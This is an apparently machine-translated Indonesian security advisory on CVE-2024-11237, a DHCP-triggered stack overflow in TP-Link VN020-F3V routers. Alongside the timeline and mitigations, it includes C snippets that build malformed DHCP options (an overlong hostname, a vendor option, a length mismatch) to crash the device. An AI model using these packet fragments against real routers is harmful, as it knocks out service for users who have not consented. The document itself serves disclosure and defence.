TP Thumper

Kerentanan kritis telah ditemukan di router TP-Link VN020 F3V (T) yang menjalankan versi firmware TT_V6.2.1021. Kerentanan memungkinkan penyerang jarak jauh untuk memicu buffer berbasis tumpukan melalui paket DHCP Discover yang dibuat khusus, yang mengarah ke kondisi penolakan layanan (DOS).

Perangkat yang terpengaruh:

• Model Router: TP-Link VN020-F3V (T)
• Versi Firmware: TT_V6.2.1021
• Penempatan: Terutama melalui Tunisie Telecom dan Topnet ISP
• Varian yang Dikonfirmasi: Juga memengaruhi versi Aljazair dan Maroko

Catatan penting: Karena sifat milik firmware, detail implementasi internal yang tepat tidak diketahui. Analisis ini didasarkan pada perilaku yang diamati dan pengujian kotak hitam.

• ID CVE : CVE-2024-11237
• Jenis : Buffer overflow (CWE-121)
• Vektor Serangan : Remote (paket DHCP Discover)
• Otentikasi : Tidak ada yang diperlukan
• Port : UDP/67 (server DHCP)
• Dampak : DOS (Dikonfirmasi) & RCE (Kemungkinan)
• Kompleksitas : Rendah

 [Basic DHCP Header]
0x00: 01        ; BOOTREQUEST
0x01: 01        ; Hardware type (Ethernet)
0x02: 06        ; Hardware address length
0x03: 00        ; Hops
0x04-0x07: XID  ; Random transaction ID
0x08-0x09: 0000 ; Seconds elapsed
0x0A-0x0B: 8000 ; Flags (Broadcast)
0x0C-0x1F: 0000 ; Client/Server/Gateway IPs
0x20-0x28: MAC  ; Client hardware address
0x29-0x2C: 0000 ; Padding

1. Pemrosesan nama host DHCP

 // Overflow trigger through hostname option
unsigned char long_hostname [ 128 ];
memset ( long_hostname , 'A' , sizeof ( long_hostname ) - 1 );
long_hostname [ 127 ] = '' ;
add_option ( packet , offset , 0x0C , 127 , long_hostname );

2. Opsi khusus vendor

 // Vendor option manipulation
unsigned char vendor_specific [] = { 
    0x00 , 0x14 , 0x22 ,  // TP-Link vendor prefix
    0xFF , 0xFF , 0xFF   // Trigger condition
};
add_option ( packet , offset , 0x2B , sizeof ( vendor_specific ), vendor_specific );

3. Manipulasi lapangan panjang

 // Claimed vs actual length mismatch
add_option ( packet , offset , 0x3D , 0xFF , ( unsigned char []) { 0x01 });

Sementara implementasi internal yang tepat tidak diketahui, perilaku yang diamati menunjukkan masalah korupsi memori yang potensial:

Pemrosesan nama host DHCP normal

 Stack Layout (Normal Case)
+------------------------+ Higher addresses
|     Previous Frame     |
+------------------------+
|   Return Address (4)   |
+------------------------+
|    Saved EBP (4)       |
+------------------------+
|                        |
|   Hostname Buffer      |
|      (64 bytes)        |
|                        |
+------------------------+ Lower addresses
|    Other Variables     |
+------------------------+

Apa yang berpotensi terjadi di dalam router?

 Stack Layout (Overflow Case)
+------------------------+ Higher addresses
|     Previous Frame     |
+------------------------+
|   Overwritten Return   | 
+------------------------+
|   Overwritten EBP      | <- Unknown state corruption
+------------------------+
|     Overflow Data      | <- 127 bytes of 'A'
|         ...            |
+------------------------+ Lower addresses
|    Other Variables     | <- Potentially corrupted
+------------------------+

Ini adalah teoretis, dan detail tertentu mungkin tidak sepenuhnya akurat, karena TP-Link menyediakan firmware untuk router ini secara eksklusif ke ISP.

Router juga dapat mencoba memulai kembali diri seperti yang ditunjukkan di sini karena kecelakaan seperti yang ditunjukkan di sini:

• Perangkat langsung tidak responsif
• Kegagalan Layanan DHCP
• Restart router otomatis
• Gangguan jaringan yang membutuhkan intervensi manual

• Penemuan Awal : 20 Oktober 2024
• Pemberitahuan Vendor : 3 November 2024
• Penugasan CVE : 15 November 2024

Tidak ada tambalan resmi saat ini tersedia. Mitigasi sementara meliputi:

1. Nonaktifkan server DHCP jika tidak diperlukan
2. Menerapkan penyaringan lalu lintas DHCP di tepi jaringan
3. Pertimbangkan model router alternatif jika memungkinkan

1. CVE-2024-11237
2. CWE-121: Buffer overflow berbasis tumpukan

Mohamed Mausallah

• GitHub: @zephkek
• Afiliasi: Peneliti Keamanan Independen